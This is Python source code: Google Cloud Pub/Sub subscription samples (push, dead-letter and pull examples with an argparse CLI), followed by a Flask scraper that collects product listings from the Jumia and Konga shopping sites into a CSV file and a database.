    # TODO(developer)
    # project_id = "your-project-id"
    # topic_id = "your-topic-id"
    # subscription_id = "your-subscription-id"
    # endpoint = "https://my-test-project.appspot.com/push"
    subscriber = pubsub_v1.SubscriberClient()
    topic_path = subscriber.topic_path(project_id, topic_id)
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    # Messages will be pushed (HTTP POST) to this endpoint instead of pulled.
    push_config = pubsub_v1.types.PushConfig(push_endpoint=endpoint)
    # Wrap the subscriber in a 'with' block to automatically call close() to
    # close the underlying gRPC channel when done.
    with subscriber:
        subscription = subscriber.create_subscription(
            subscription_path, topic_path, push_config
        )
        print("Push subscription created: {}".format(subscription))
        print("Endpoint for subscription is: {}".format(endpoint))
    # [END pubsub_create_push_subscription]
def delete_subscription(project_id, subscription_id):
    """Deletes an existing Pub/Sub subscription."""
    # [START pubsub_delete_subscription]
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    client = pubsub_v1.SubscriberClient()
    path = client.subscription_path(project_id, subscription_id)
    # The 'with' block closes the underlying gRPC channel on exit.
    with client:
        client.delete_subscription(path)
        print("Subscription deleted: {}".format(path))
    # [END pubsub_delete_subscription]
def update_push_subscription(project_id: str, topic_id: str, subscription_id: str, endpoint: str) -> None:
    """
    Updates an existing Pub/Sub subscription's push endpoint URL.
    Note that certain properties of a subscription, such as
    its topic, are not modifiable.
    """
    # [START pubsub_update_push_configuration]
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # topic_id = "your-topic-id"
    # subscription_id = "your-subscription-id"
    # endpoint = "https://my-test-project.appspot.com/push"
    subscriber = pubsub_v1.SubscriberClient()
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    push_config = pubsub_v1.types.PushConfig(push_endpoint=endpoint)
    subscription = pubsub_v1.types.Subscription(
        name=subscription_path, topic=topic_id, push_config=push_config
    )
    # Only the push_config field is touched by the update.
    # NOTE(review): "paths" is a set literal here; FieldMask's repeated field
    # accepts any iterable, but a list is the conventional form — confirm.
    update_mask = {"paths": {"push_config"}}
    # Wrap the subscriber in a 'with' block to automatically call close() to
    # close the underlying gRPC channel when done.
    with subscriber:
        result = subscriber.update_subscription(subscription, update_mask)
        print("Subscription updated: {}".format(subscription_path))
        print("New endpoint for subscription is: {}".format(result.push_config))
    # [END pubsub_update_push_configuration]
def update_subscription_with_dead_letter_policy(
    project_id: str, topic_id: str, subscription_id: str, dead_letter_topic_id: str
):
    """Update a subscription's dead letter policy."""
    # [START pubsub_dead_letter_update_subscription]
    from google.cloud import pubsub_v1
    from google.cloud.pubsub_v1.types import DeadLetterPolicy, FieldMask
    # TODO(developer)
    # project_id = "your-project-id"
    # TODO(developer): This is an existing topic that the subscription
    # with dead letter policy is attached to.
    # topic_id = "your-topic-id"
    # TODO(developer): This is an existing subscription with a dead letter policy.
    # subscription_id = "your-subscription-id"
    # TODO(developer): This is an existing dead letter topic that the subscription
    # with dead letter policy will forward dead letter messages to.
    # dead_letter_topic_id = "your-dead-letter-topic-id"
    subscriber = pubsub_v1.SubscriberClient()
    topic_path = subscriber.topic_path(project_id, topic_id)
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    dead_letter_topic_path = subscriber.topic_path(project_id, dead_letter_topic_id)
    subscription_before_update = subscriber.get_subscription(subscription_path)
    print("Before the update: {}".format(subscription_before_update))
    # Indicates which fields in the provided subscription to update.
    update_mask = FieldMask(paths=["dead_letter_policy.max_delivery_attempts"])
    # Construct a dead letter policy you expect to have after the update.
    dead_letter_policy = DeadLetterPolicy(
        dead_letter_topic=dead_letter_topic_path, max_delivery_attempts=20
    )
    # Construct the subscription with the dead letter policy you expect to have
    # after the update. Here, values in the required fields (name, topic) help
    # identify the subscription.
    subscription = pubsub_v1.types.Subscription(
        name=subscription_path, topic=topic_path, dead_letter_policy=dead_letter_policy,
    )
    with subscriber:
        subscription_after_update = subscriber.update_subscription(
            subscription, update_mask
        )
        print("After the update: {}".format(subscription_after_update))
    # [END pubsub_dead_letter_update_subscription]
    # Returned so callers (and tests) can inspect the updated Subscription.
    return subscription_after_update
def remove_dead_letter_policy(project_id: str, topic_id: str, subscription_id: str):
    """Remove dead letter policy from a subscription."""
    # [START pubsub_dead_letter_remove]
    from google.cloud import pubsub_v1
    from google.cloud.pubsub_v1.types import FieldMask
    # TODO(developer)
    # project_id = "your-project-id"
    # TODO(developer): This is an existing topic that the subscription
    # with dead letter policy is attached to.
    # topic_id = "your-topic-id"
    # TODO(developer): This is an existing subscription with a dead letter policy.
    # subscription_id = "your-subscription-id"
    subscriber = pubsub_v1.SubscriberClient()
    topic_path = subscriber.topic_path(project_id, topic_id)
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    subscription_before_update = subscriber.get_subscription(subscription_path)
    print("Before removing the policy: {}".format(subscription_before_update))
    # Indicates which fields in the provided subscription to update.
    update_mask = FieldMask(
        paths=[
            "dead_letter_policy.dead_letter_topic",
            "dead_letter_policy.max_delivery_attempts",
        ]
    )
    # Construct the subscription (without any dead letter policy) that you
    # expect to have after the update.
    subscription = pubsub_v1.types.Subscription(
        name=subscription_path, topic=topic_path
    )
    with subscriber:
        subscription_after_update = subscriber.update_subscription(
            subscription, update_mask
        )
        print("After removing the policy: {}".format(subscription_after_update))
    # [END pubsub_dead_letter_remove]
    # Returned so callers (and tests) can inspect the updated Subscription.
    return subscription_after_update
def receive_messages(project_id: str, subscription_id: str, timeout=None) -> None:
    """Receives messages from a pull subscription."""
    # [START pubsub_subscriber_async_pull]
    # [START pubsub_quickstart_subscriber]
    from concurrent.futures import TimeoutError
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    # Number of seconds the subscriber should listen for messages
    # timeout = 5.0
    subscriber = pubsub_v1.SubscriberClient()
    # The `subscription_path` method creates a fully qualified identifier
    # in the form `projects/{project_id}/subscriptions/{subscription_id}`
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    def callback(message):
        # Invoked (possibly concurrently) for every delivered message.
        print("Received message: {}".format(message))
        message.ack()
    streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
    print("Listening for messages on {}..\n".format(subscription_path))
    # Wrap subscriber in a 'with' block to automatically call close() when done.
    with subscriber:
        try:
            # When `timeout` is not set, result() will block indefinitely,
            # unless an exception is encountered first.
            streaming_pull_future.result(timeout=timeout)
        except TimeoutError:
            streaming_pull_future.cancel()
    # [END pubsub_subscriber_async_pull]
    # [END pubsub_quickstart_subscriber]
def receive_messages_with_custom_attributes(project_id: str, subscription_id: str, timeout=None) -> None:
    """Receives messages from a pull subscription."""
    # [START pubsub_subscriber_async_pull_custom_attributes]
    from concurrent.futures import TimeoutError
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    # Number of seconds the subscriber should listen for messages
    # timeout = 5.0
    subscriber = pubsub_v1.SubscriberClient()
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    def callback(message):
        # Print payload plus any custom attributes attached to the message.
        print("Received message: {}".format(message.data))
        if message.attributes:
            print("Attributes:")
            for key in message.attributes:
                value = message.attributes.get(key)
                print("{}: {}".format(key, value))
        message.ack()
    streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
    print("Listening for messages on {}..\n".format(subscription_path))
    # Wrap subscriber in a 'with' block to automatically call close() when done.
    with subscriber:
        try:
            # When `timeout` is not set, result() will block indefinitely,
            # unless an exception is encountered first.
            streaming_pull_future.result(timeout=timeout)
        except TimeoutError:
            streaming_pull_future.cancel()
    # [END pubsub_subscriber_async_pull_custom_attributes]
def receive_messages_with_flow_control(project_id: str, subscription_id: str, timeout=None) -> None:
    """Receives messages from a pull subscription with flow control."""
    # [START pubsub_subscriber_flow_settings]
    from concurrent.futures import TimeoutError
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    # Number of seconds the subscriber should listen for messages
    # timeout = 5.0
    subscriber = pubsub_v1.SubscriberClient()
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    def callback(message):
        print("Received message: {}".format(message.data))
        message.ack()
    # Limit the subscriber to only have ten outstanding messages at a time.
    flow_control = pubsub_v1.types.FlowControl(max_messages=10)
    streaming_pull_future = subscriber.subscribe(
        subscription_path, callback=callback, flow_control=flow_control
    )
    print("Listening for messages on {}..\n".format(subscription_path))
    # Wrap subscriber in a 'with' block to automatically call close() when done.
    with subscriber:
        try:
            # When `timeout` is not set, result() will block indefinitely,
            # unless an exception is encountered first.
            streaming_pull_future.result(timeout=timeout)
        except TimeoutError:
            streaming_pull_future.cancel()
    # [END pubsub_subscriber_flow_settings]
def synchronous_pull(project_id: str, subscription_id: str) -> None:
    """Pulling messages synchronously."""
    # [START pubsub_subscriber_sync_pull]
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    subscriber = pubsub_v1.SubscriberClient()
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    NUM_MESSAGES = 3
    # Wrap the subscriber in a 'with' block to automatically call close() to
    # close the underlying gRPC channel when done.
    with subscriber:
        # The subscriber pulls a specific number of messages.
        response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
        ack_ids = []
        for received_message in response.received_messages:
            print("Received: {}".format(received_message.message.data))
            ack_ids.append(received_message.ack_id)
        # Acknowledges the received messages so they will not be sent again.
        subscriber.acknowledge(subscription_path, ack_ids)
        print(
            "Received and acknowledged {} messages. Done.".format(
                len(response.received_messages)
            )
        )
    # [END pubsub_subscriber_sync_pull]
def synchronous_pull_with_lease_management(project_id: str, subscription_id: str) -> None:
    """Pulling messages synchronously with lease management"""
    # [START pubsub_subscriber_sync_pull_with_lease]
    import logging
    import multiprocessing
    import random
    import time
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    subscriber = pubsub_v1.SubscriberClient()
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    NUM_MESSAGES = 2
    # Seconds the ack deadline is extended to on each renewal (10..600 allowed).
    ACK_DEADLINE = 30
    # Seconds between lease-renewal sweeps over the worker processes.
    SLEEP_TIME = 10
    # The subscriber pulls a specific number of messages.
    response = subscriber.pull(subscription_path, max_messages=NUM_MESSAGES)
    multiprocessing.log_to_stderr()
    logger = multiprocessing.get_logger()
    logger.setLevel(logging.INFO)
    def worker(msg):
        """Simulates a long-running process."""
        RUN_TIME = random.randint(1, 60)
        logger.info(
            "{}: Running {} for {}s".format(
                time.strftime("%X", time.gmtime()), msg.message.data, RUN_TIME
            )
        )
        time.sleep(RUN_TIME)
    # `processes` stores process as key and ack id and message as values.
    processes = dict()
    for message in response.received_messages:
        process = multiprocessing.Process(target=worker, args=(message,))
        processes[process] = (message.ack_id, message.message.data)
        process.start()
    while processes:
        # Iterate over a snapshot (list(...)) so entries can be popped safely.
        for process in list(processes):
            ack_id, msg_data = processes[process]
            # If the process is still running, reset the ack deadline as
            # specified by ACK_DEADLINE once every while as specified
            # by SLEEP_TIME.
            if process.is_alive():
                # `ack_deadline_seconds` must be between 10 to 600.
                subscriber.modify_ack_deadline(
                    subscription_path, [ack_id], ack_deadline_seconds=ACK_DEADLINE,
                )
                logger.info(
                    "{}: Reset ack deadline for {} for {}s".format(
                        time.strftime("%X", time.gmtime()), msg_data, ACK_DEADLINE,
                    )
                )
            # If the process is finished, acknowledges using `ack_id`.
            else:
                subscriber.acknowledge(subscription_path, [ack_id])
                logger.info(
                    "{}: Acknowledged {}".format(
                        time.strftime("%X", time.gmtime()), msg_data
                    )
                )
                processes.pop(process)
        # If there are still processes running, sleeps the thread.
        if processes:
            time.sleep(SLEEP_TIME)
    print(
        "Received and acknowledged {} messages. Done.".format(
            len(response.received_messages)
        )
    )
    # Close the underlying gPRC channel. Alternatively, wrap subscriber in
    # a 'with' block to automatically call close() when done.
    subscriber.close()
    # [END pubsub_subscriber_sync_pull_with_lease]
def listen_for_errors(project_id: str, subscription_id: str, timeout=None) -> None:
    """Receives messages and catches errors from a pull subscription."""
    # [START pubsub_subscriber_error_listener]
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    # Number of seconds the subscriber should listen for messages
    # timeout = 5.0
    subscriber = pubsub_v1.SubscriberClient()
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    def callback(message):
        print("Received message: {}".format(message))
        message.ack()
    streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
    print("Listening for messages on {}..\n".format(subscription_path))
    # Wrap subscriber in a 'with' block to automatically call close() when done.
    with subscriber:
        # When `timeout` is not set, result() will block indefinitely,
        # unless an exception is encountered first.
        try:
            streaming_pull_future.result(timeout=timeout)
        except Exception as e:
            # Any streaming error (not just TimeoutError) cancels the pull.
            streaming_pull_future.cancel()
            print(
                "Listening for messages on {} threw an exception: {}.".format(
                    subscription_id, e
                )
            )
    # [END pubsub_subscriber_error_listener]
def receive_messages_with_delivery_attempts(project_id: str, subscription_id: str, timeout=None) -> None:
    """Receives messages and prints each message's delivery attempt count."""
    # [START pubsub_dead_letter_delivery_attempt]
    from concurrent.futures import TimeoutError
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # subscription_id = "your-subscription-id"
    subscriber = pubsub_v1.SubscriberClient()
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    def callback(message):
        print("Received message: {}".format(message))
        # delivery_attempt is populated for subscriptions with a dead letter policy.
        print("With delivery attempts: {}".format(message.delivery_attempt))
        message.ack()
    streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
    print("Listening for messages on {}..\n".format(subscription_path))
    # Wrap subscriber in a 'with' block to automatically call close() when done.
    with subscriber:
        # When `timeout` is not set, result() will block indefinitely,
        # unless an exception is encountered first.
        try:
            streaming_pull_future.result(timeout=timeout)
        except TimeoutError:
            streaming_pull_future.cancel()
    # [END pubsub_dead_letter_delivery_attempt]
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("project_id", help="Your Google Cloud project ID")
subparsers = parser.add_subparsers(dest="command")
list_in_topic_parser = subparsers.add_parser(
"list-in-topic", help=list_subscriptions_in_topic.__doc__
)
list_in_topic_parser.add_argument("topic_id")
list_in_project_parser = subparsers.add_parser(
"list-in-project", help=list_subscriptions_in_project.__doc__
)
create_parser = subparsers.add_parser("create", help=create_subscription.__doc__)
create_parser.add_argument("topic_id")
create_parser.add_argument("subscription_id")
create_with_dead_letter_policy_parser = subparsers.add_parser(
"create-with-dead-letter-policy",
help=create_subscription_with_dead_letter_topic.__doc__,
)
create_with_dead_letter_policy_parser.add_argument("topic_id")
create_with_dead_letter_policy_parser.add_argument("subscription_id")
create_with_dead_letter_policy_parser.add_argument("dead_letter_topic_id")
create_push_parser = subparsers.add_parser(
"create-push", help=create_push_subscription.__doc__
)
create_push_parser.add_argument("topic_id")
create_push_parser.add_argument("subscription_id")
create_push_parser.add_argument("endpoint")
delete_parser = subparsers.add_parser("delete", help=delete_subscription.__doc__)
delete_parser.add_argument("subscription_id")
update_push_parser = subparsers.add_parser(
"update-push", help=update_push_subscription.__doc__
)
update_push_parser.add_argument("topic_id")
update_push_parser.add_argument("subscription_id")
update_push_parser.add_argument("endpoint")
update_dead_letter_policy_parser = subparsers.add_parser(
"update-dead-letter-policy",
help=update_subscription_with_dead_letter_policy.__doc__,
)
update_dead_letter_policy_parser.add_argument("topic_id")
update_dead_letter_policy_parser.add_argument("subscription_id")
update_dead_letter_policy_parser.add_argument("dead_letter_topic_id")
remove_dead_letter_policy_parser = subparsers.add_parser(
"remove-dead-letter-policy", help=remove_dead_letter_policy.__doc__
)
remove_dead_letter_policy_parser.add_argument("topic_id")
remove_dead_letter_policy_parser.add_argument("subscription_id")
receive_parser = subparsers.add_parser("receive", help=receive_messages.__doc__)
receive_parser.add_argument("subscription_id")
receive_parser.add_argument("timeout", default=None, type=float, nargs="?")
receive_with_custom_attributes_parser = subparsers.add_parser(
"receive-custom-attributes",
help=receive_messages_with_custom_attributes.__doc__,
)
receive_with_custom_attributes_parser.add_argument("subscription_id")
receive_with_custom_attributes_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
receive_with_flow_control_parser = subparsers.add_parser(
"receive-flow-control", help=receive_messages_with_flow_control.__doc__
)
receive_with_flow_control_parser.add_argument("subscription_id")
receive_with_flow_control_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
synchronous_pull_parser = subparsers.add_parser(
"receive-synchronously", help=synchronous_pull.__doc__
)
synchronous_pull_parser.add_argument("subscription_id")
synchronous_pull_with_lease_management_parser = subparsers.add_parser(
"receive-synchronously-with-lease",
help=synchronous_pull_with_lease_management.__doc__,
)
synchronous_pull_with_lease_management_parser.add_argument("subscription_id")
listen_for_errors_parser = subparsers.add_parser(
"listen-for-errors", help=listen_for_errors.__doc__
)
listen_for_errors_parser.add_argument("subscription_id")
listen_for_errors_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
receive_messages_with_delivery_attempts_parser = subparsers.add_parser(
"receive-messages-with-delivery-attempts",
help=receive_messages_with_delivery_attempts.__doc__,
)
receive_messages_with_delivery_attempts_parser.add_argument("subscription_id")
receive_messages_with_delivery_attempts_parser.add_argument(
"timeout", default=None, type=float, nargs="?"
)
args = parser.parse_args()
if args.command == "list-in-topic":
list_subscriptions_in_topic(args.project_id, args.topic_id)
elif args.command == "list-in-project":
list_subscriptions_in_project(args.project_id)
elif args.command == "create":
create_subscription(args.project_id, args.topic_id, args.subscription_id)
elif args.command == "create-with-dead-letter-policy":
create_subscription_with_dead_letter_topic(
args.project_id,
args.topic_id,
args.subscription_id,
args.dead_letter_topic_id,
)
elif args.command == "create-push":
create_push_subscription(
args.project_id, args.topic_id, args.subscription_id, args.endpoint,
)
elif args.command == "delete":
delete_subscription(args.project_id, args.subscription_id)
elif args.command == "update-push":
update_push_subscription(
args.project_id, args.topic_id, args.subscription_id, args.endpoint,
)
elif args.command == "update-dead-letter-policy":
update_subscription_with_dead_letter_policy(
args.project_id,
args.topic_id,
args.subscription_id,
args.dead_letter_topic_id,
)
elif args.command == "remove-dead-letter-policy":
remove_dead_letter_policy(args.project_id, args.topic_id, args.subscription_id)
elif args.command == "receive":
receive_messages(args.project_id, args.subscription_id, args.timeout)
elif args.command == "receive-custom-attributes":
receive_messages_with_custom_attributes(
args.project_id, args.subscription_id, args.timeout
)
elif args.command == "receive-flow-control":
receive_messages_with_flow_control(
args.project_id, args.subscription_id, args.timeout
)
elif args.command == "receive-synchronously":
synchronous_pull(args.project_id, args.subscription_id)
elif args.command == "receive-synchronously-with-lease":
synchronous_pull_with_lease_management(args.project_id, args.subscription_id)
elif args.command == "listen-for-errors":
listen_for_errors(args.project_id, args.subscription_id, args.timeout)
elif args.command == "receive-messages-with-delivery-attempts":
receive_messages_with_delivery_attempts(
args.project_id, args.subscription_id, args.timeout
)
|
scrape.py |
"""
Scrape data from Jumia and Konga.
Add data to file.
Add data to database.
"""
from flask import Flask
from requests_html import HTML, HTMLSession
from time import perf_counter
from multiprocessing import Process
from csv import writer
from simplified.scrape.models import *
import os
app = Flask(__name__)
#database configuration
app.config["SQLALCHEMY_DATABASE_URI"] = os.getenv("DATABASE_URL")
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.init_app(app)
session = HTMLSession()
def jumia(categ, url, test=False):
    """Scrapes Jumia product listings for one category.

    Walks every pagination page of `url`, visits each product's detail page,
    and records products that have at least one review and >= 2.5 stars into
    products.csv (append mode) and the Products database table.

    Args:
        categ: category label stored alongside each product.
        url: category listing URL to scrape.
        test: when True, only checks that the listing page is reachable and
            returns True without scraping (used as a smoke test).
    """
    print(f"scrapping {categ} on {url}")
    #list params
    name = ""
    sku = ""
    price = ""
    stars = 0
    link = ""
    image_url = ""
    reviews = 0
    seller = "jumia"
    category = categ
    description = ""
    counter = 0
    score = 0
    #scrape
    initial = session.get(url)
    if (initial.status_code == 200):
        # Last pagination link holds the total page count.
        rawcount = initial.html.find("body > main > section.osh-content > section.pagination > ul > li:nth-child(5) > a", first=True)
        count = int(rawcount.text)
        if (test == True):
            return True
        for i in range(count):
            response = session.get(f"{url}?page={i+1}")
            if (response.status_code == 200):
                try:
                    section = response.html.find(".products", first=True)
                    products = section.find(".sku")
                except Exception as e:
                    # Layout changed or empty page: skip this page.
                    continue
                for product in products:
                    counter += 1
                    try:
                        #get sku
                        sku = product.attrs['data-sku']
                    except Exception as e:
                        continue
                    linker = product.find(".link", first=True)
                    try:
                        #get link
                        link = linker.attrs['href']
                    except Exception as e:
                        continue
                    title = linker.find(".title", first=True)
                    brand = title.find(".brand", first=True).text
                    prename = title.find(".name", first=True).text
                    #get name
                    name = f"{brand} {prename}"
                    price_container = linker.find(".price-container", first=True)
                    price_box = price_container.find(".price-box", first=True)
                    pricer = price_box.find(".price", first=True)
                    #get price (drop the naira sign and surrounding spaces)
                    price = pricer.text.strip("₦").strip(" ")
                    try:
                        rating_stars = linker.find(".rating-stars", first=True)
                        total_ratings = rating_stars.find(".total-ratings", first=True)
                        rawreview = int(total_ratings.text.strip("(").strip(")"))
                        if (rawreview < 1):
                            # Products with no reviews are skipped.
                            continue
                        else:
                            #get reviews
                            reviews = rawreview
                    except Exception as e:
                        continue
                    # Visit the product detail page for image/description/stars.
                    each = session.get(link)
                    if (each.status_code == 200):
                        main_imgs = each.html.find(".sldr", first=True)
                        try:
                            a_imgs = main_imgs.find("a", first=True)
                            imgs = a_imgs.find("img", first=True)
                        except Exception as e:
                            continue
                        #get image_url
                        image_url = imgs.attrs['data-src']
                        features = each.html.find("#jm > main > div:nth-child(3) > div.col12 > section.card.aim.-mtm.-fs16 > div.row.-pas > article:nth-child(1)", first=True)
                        new = each.html.find("#jm > main > div:nth-child(3) > div.col12 > section.card.aim.-mtm.-fs16 > div.row.-pas > article:nth-child(2) > div", first=True)
                        try:
                            #get description (flatten newlines so CSV rows stay one line)
                            describe = f"{features.text}\n{new.text}"
                            description = describe.strip(" ").lstrip("Key Features").replace("\n", "\t")
                        except Exception as e:
                            continue
                        rawstar = each.html.find("#jm > main > div:nth-child(3) > div.col12 > section:nth-child(5) > div.row.-fw-nw > div.col4.-phm > div > div.-fs29.-yl5.-pvxs > span", first=True)
                        try:
                            if (float(rawstar.text) < float(2.5)):
                                # Quality threshold: only keep >= 2.5 star products.
                                continue
                            else:
                                #get stars
                                stars = float(rawstar.text)
                                score += 1
                                # NOTE: `each` is reused here as the CSV row list.
                                each = [name, sku, price, stars, link, image_url, reviews, seller, category, description]
                                #write to file
                                try:
                                    with open("products.csv", 'a', encoding="utf-8") as product_file:
                                        product_filewrite = writer(product_file)
                                        product_filewrite.writerow(each)
                                    print(f"-> SUCS fileWRITE-> write successfully Jumia | {categ} | {name[0:10]} to file...")
                                except Exception as e:
                                    print(f"-> ERR fileWRITE-> could not add Jumia|{categ}|{name[0:10]} to file: {e}")
                                #write to database
                                try:
                                    with app.app_context():
                                        item = Products(name=name, sku=sku, price=price, stars=stars, link=link, image_url=image_url, reviews=reviews, seller=seller, category=category, description=description)
                                        db.session.add(item)
                                        db.session.commit()
                                    print(f"-> SUCS dbADD-> added successfully Jumia|{categ}|{name[0:10]} to database")
                                except Exception as e:
                                    print(f"-> ERR dbADD-> could not add Jumia|{categ}|{name[0:10]} to database: {e}")
                        except Exception as e:
                            continue
    print(f"-> END: Jumia | {categ} | counts: {score} of {counter}")
def konga(categ, url, test=False):
    """Scrapes Konga product listings for one category.

    Mirrors jumia(): walks every pagination page of `url`, visits each
    product's detail page, and records reviewed products into products.csv
    (append mode) and the Products database table.

    Args:
        categ: category label stored alongside each product.
        url: category listing URL to scrape.
        test: when True, only checks that the listing page is reachable and
            returns True without scraping (used as a smoke test).
    """
    print(f"scrapping {categ} on {url}")
    #list params
    name = ""
    sku = ""
    price = ""
    stars = 0
    link = ""
    image_url = ""
    reviews = 0
    seller = "konga"
    category = categ
    description = ""
    counter = 0
    score = 0
    #scrape
    initial = session.get(url)
    if (initial.status_code == 200):
        # Pagination entry holding the total page count.
        rawcount = initial.html.find("#mainContent > section._9cac3_2I9l4 > section > section > div > ul > li:nth-child(4) > a", first=True)
        count = int(rawcount.text)
        if (test == True):
            return True
        for i in range(count):
            response = session.get(f"{url}?page={i+1}")
            if (response.status_code == 200):
                section = response.html.find("#mainContent > section._9cac3_2I9l4 > section > section > section > section > ul", first=True)
                products = section.find("li")
                for product in products:
                    # Walk down the nested card markup to reach the anchor.
                    each = product.find("div", first=True)
                    next_each = each.find("div", first=True)
                    diver = next_each.find("div", first=True)
                    linker = diver.find("a", first=True)
                    #get link (Konga hrefs are site-relative)
                    link = f"https://www.konga.com{linker.attrs['href']}"
                    next_down_each = next_each.find("._4941f_1HCZm", first=True)
                    former = next_down_each.find("form", first=True)
                    reviewer = former.find(".ccc19_2IYt0", first=True)
                    next_deep = reviewer.find('.a455c_3G0na', first=True)
                    deep_span = next_deep.find('.eea9b_1Ma8-', first=True)
                    counter += 1
                    if deep_span.text.strip("(").strip(")") == "No reviews yet":
                        # Unreviewed products are skipped.
                        continue
                    else:
                        #get reviews
                        reviews = int(deep_span.text.strip("Review").strip("Reviews").strip(" "))
                        if reviews < 1:
                            continue
                    # Visit the product detail page for the remaining fields.
                    # NOTE: `each` is reused here for the detail-page response.
                    each = session.get(link)
                    if (each.status_code == 200):
                        namer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > h4", first=True)
                        #get name
                        name = namer.text
                        skuer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > form > div._31c33_NSdat > div._97fc0_3W515.b50e0_1HOLM > span", first=True)
                        #get sku
                        sku = skuer.text
                        pricer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > form > div._3924b_1USC3._16f96_38E1t > div._3924b_1USC3 > div._678e4_e6nqh", first=True)
                        #get price (drop the naira sign)
                        price = pricer.text.strip("₦")
                        imager = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT", first=True)
                        pictr = imager.find(".bf1a2_3kz7s", first=True).find("._3a8a4_3Bhwv", first=True).find(".fd8e9_1qWnZ", first=True)
                        pictr = pictr.find("._7f96a_3PgMp", first=True)
                        pictr = pictr.find("img", first=True)
                        #get image_url
                        image_url = pictr.attrs['src']
                        #get description (flatten newlines so CSV rows stay one line)
                        describe = each.html.find("#mainContent > div > div.d9549_IlL3h > div._227af_AT9tO > div._79826_3-pAs > div._3383f_1xAuk > div > div", first=True).text
                        description = describe.strip(" ").replace("\n", "\t")
                        starer = each.html.find("#mainContent > div > div.d9549_IlL3h > div._8f9c3_230YI._47f1e_1dZrT > div._680e2_KPkEz > div > form > div._31c33_NSdat > div.a455c_3G0na.af1a1_3wVPH", first=True)
                        try:
                            # Stars are rendered as SVG icons; count the filled ones.
                            starcount = 0
                            svgs = starer.find("svg")
                            for svg in svgs:
                                if (svg.attrs['class'][0] == "ba6f2_18Jb4"):
                                    starcount += 1
                            #get stars
                            stars = starcount
                            score += 1
                            # NOTE: `each` is reused again as the CSV row list.
                            each = [name, sku, price, stars, link, image_url, reviews, seller, category, description]
                            #write to file
                            try:
                                with open("products.csv", 'a', encoding="utf-8") as product_file:
                                    product_filewrite = writer(product_file)
                                    product_filewrite.writerow(each)
                                print(f"-> SUCS fileWRITE-> write successfully Konga | {categ} | {name[0:10]} to file...")
                            except Exception as e:
                                print(f"-> ERR fileWRITE-> could not add Konga|{categ}|{name[0:10]} to file: {e}")
                            #write to database
                            try:
                                with app.app_context():
                                    item = Products(name=name, sku=sku, price=price, stars=stars, link=link, image_url=image_url, reviews=reviews, seller=seller, category=category, description=description)
                                    db.session.add(item)
                                    db.session.commit()
                                print(f"-> SUCS dbADD-> added successfully Konga|{categ}|{name[0:10]} to database")
                            except Exception as e:
                                print(f"-> ERR dbADD-> could not add Konga|{categ}|{name[0:10]} to database: {e}")
                        except Exception as e:
                            continue
    print(f"-> END: konga | {categ} | counts: {score} of {counter}")
if __name__ == '__main__':
    #start timer
    start = perf_counter()

    #drop all rows in Products table
    with app.app_context():
        try:
            Products.query.delete()
            db.session.commit()
            print("Database Products Table cleared successfully")
        except Exception as e:
            print(f"Could not delete rows in Products table: {e}")

    # BUG FIX: write the CSV header BEFORE starting the worker processes.
    # Opening with mode 'w' truncates products.csv; previously this happened
    # AFTER .start(), so rows appended by a fast worker could be wiped out
    # and the header could land in the middle of the file.
    each = ["name", "sku", "price", "stars", "link", "image_url", "reviews", "seller", "category", "description"]
    with open("products.csv", 'w', encoding="utf-8") as product_file:
        product_filewrite = writer(product_file)
        product_filewrite.writerow(each)

    # One process per (site, category) pair so the scrapers run concurrently.
    #jumia #konga
    jumia_fashion = Process(target=jumia, args=["fashion", "https://www.jumia.com.ng/category-fashion-by-jumia/"])
    konga_computing = Process(target=konga, args=["computing", "https://www.konga.com/category/computers-accessories-5227"])
    konga_electronics = Process(target=konga, args=["electronics", "https://www.konga.com/category/electronics-5261"])
    konga_fashion = Process(target=konga, args=["fashion", "https://www.konga.com/category/konga-fashion-1259"])
    jumia_health_beauty = Process(target=jumia, args=["health and beauty", "https://www.jumia.com.ng/health-beauty/"])
    jumia_home_office = Process(target=jumia, args=["home and office", "https://www.jumia.com.ng/home-office/"])
